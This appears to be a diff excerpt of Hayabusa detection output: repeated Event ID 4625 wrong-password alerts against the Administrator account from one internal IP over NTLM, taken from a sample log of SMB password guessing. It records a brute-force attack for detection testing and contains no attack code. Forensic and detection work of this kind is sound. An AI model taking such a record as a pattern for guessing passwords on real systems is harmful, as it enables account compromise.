+2016-09-20 01:52:00.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Van1qwuRoWYPWrIY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TyLCa9OHocazZKQ2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XxrR5iUsTI9LVnLL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.110 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TxMREacN0QfvL51B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7fbzSHaZBDH4zFZZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NgIei0bMIcslJCVa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JPoKjwanczELBC5A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOYMVAnCWB2RFYAk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k1S45GBtQ8Uoyilw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 60oeDAnU41sz1wYg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: enjlrrdf6lrm7Bao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58WzO6wxh7QshZgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7eZKzHgu5ADLYsWU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uOSK3xC1E5PpBVNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vFXasYWGCHbQOWWI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4XlYJ3oHYKYhg0KC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LxOKwi8Q4y2mHBDu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwFKFySH4w2yWtPX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OlwGTGadOEMfUFiM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hZ9WuMoOtxGdwOQn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cCLK0gWvRoz0Ceao | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZDrcOxtm2fHXK5pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pm2tPGetcAJkSuvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FBskiUSfF2ghuDcF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mZJal2nq3JAk6I2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y9ek0Sl1ikhIfIb6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eHrn5Tp9JtnAgCbE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k7tR8gp2piqqixqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SqSBRMoiFeWe4FAt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nu4m1xKDU0OUkoR0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gui98cdQHPgyNOZI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bm4U7TAfsPTEiygC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fDOoaVWVFAMLiA71 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qiJeLgInEkHffefo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWyguWQP2iYUArhD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vDa3GqsTMMXguFhi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Lr0lkAcdnji1zjW4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4WfNFd5MkQxaxHGP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j8hdPhtxP4Ds65yV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y2BBoWoXWXuRysTx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6GEhZ2BduHwjJj9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GbwEHQCAUJd64LlA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wGfoObbN8ioefyce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iLHhCgHvmOzoLLqG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9KL69y47DMyFOWT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ECuVYiqdMw2dMjT6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YJCYumRekD7AREYQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0H4OxKzoemZrsosT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wSHnvxa0khWdWBVx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bJkPp0bghDCPYz52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SfHRWGXjCej9HSPb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X42H7EvrvzsRqXWO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: moo42NdOq30Gnz3T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A4NHVYxxDkCOsQw8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iPUiW0vFQB405kwS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OtcZ4ymkeLHeU7YJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZxZCDKWtqkGJ0dnw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f4GGnhttZgmRPRJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gI0j9w45eXEFeex3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BVZ2YRDUAOsNgKxo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJfIpxlcwVf7pWga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Oerixd9ODF6fslsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJC5yvrIymYgaHY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4schZcUP8Im8Ee1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WotargyGlEq9PBch | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2JSMrPoucOR0nzlD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jr4w4uoF2DVZ5n9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v319oZIaOBpuf542 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GNRTL9BLlGWMx6dA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHlDIOZ9B5uY8Rzz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dr2bvAue8mr5kagX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXBds9GoXr6IZUfp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aLYuegjXO18lo342 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: To3MMEEvNXKNjKHT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
